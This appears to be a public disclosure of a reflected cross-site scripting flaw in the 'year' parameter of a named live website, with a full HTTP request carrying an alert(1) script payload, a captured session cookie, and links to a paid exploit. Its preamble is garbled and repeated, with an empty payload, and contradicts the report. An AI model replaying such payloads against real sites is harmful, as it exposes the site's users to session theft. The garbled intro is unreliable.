mrrb.bg Cross Site Scripting

Cross-Site Scripting (XSS) on `mrb.bg` would involve an attacker injecting Cross-Site Scripting (XSS) on `mrb.bg` would involve an attacker injecting malicious client-side scripts, typically JavaScript, into web pages viewed by other users.

This vulnerability usually arises when a website, like `mrb.bg`, fails to properly validate or sanitize user-supplied input before rendering it back to the browser. For example, if a search bar, comment section, or URL parameter on `mrb.bg` didn't properly escape special characters, an attacker could submit a payload like ``.

When another user views the page containing this unescaped input, their browser would execute the injected script. Potential impacts include session hijacking, defacing the website, redirecting users, or stealing sensitive information like cookies.

To prevent XSS, websites must implement robust input validation and output encoding for all user-generated content. Without specific details or a publicly confirmed report, this remains a general explanation of how XSS *could* manifest on any website.

## Titles: mrrb.bg-APP - XSS-Reflected
## Author: nu11secur1ty
## Date: 01/06/2026
## Vendor: mrrb.bg
## Software: mrrb.bg
## Reference: https://portswigger.net/web-security/cross-site-scripting

## Description:
The value of the `year` request parameter is copied into the value of an
HTML tag attribute which is encapsulated in double quotation marks. The
payload fchd2"><script>alert(1)</script>a1mg2 was submitted in the year
parameter. This input was echoed unmodified in the application's response.

STATUS: HIGH- Vulnerability

[+]PoC:
```
GET
/en/reload-calendar/?month=12&year=2025fchd2%22%3e%3cscript%3ealert(1)%3c%2fscript%3ea1mg2
HTTP/2
Host: www.mrrb.bg
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="143", "Not;A=Brand";v="24", "Google Chrome";v="143"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept: text/html, */*; q=0.01
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Cookie: GeneralAppGenSession=jqlrr36bq8q2d2ucrpm9o49g25;
_ga=GA1.2.1383633579.1767642035; _gid=GA1.2.449285359.1767642035; _gat=1;
_ga_S2X8R0459V=GS2.2.s1767642035$o1$g1$t1767642039$j56$l0$h0
X-Requested-With: XMLHttpRequest
Referer: https://www.mrrb.bg/en/
```

[+]Custom PoC - Exploit:
```
170 Euro
```
## Link:
[href](https://venvar.gumroad.com/l/fpfywm)

## Demo PoC:
[href](https://www.patreon.com/posts/mrrb-bg-xss-147550429)

## Time spent:
04:27:00


--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
home page: https://www.asc3t1c-nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <https://nu11secur1ty.blogspot.com/>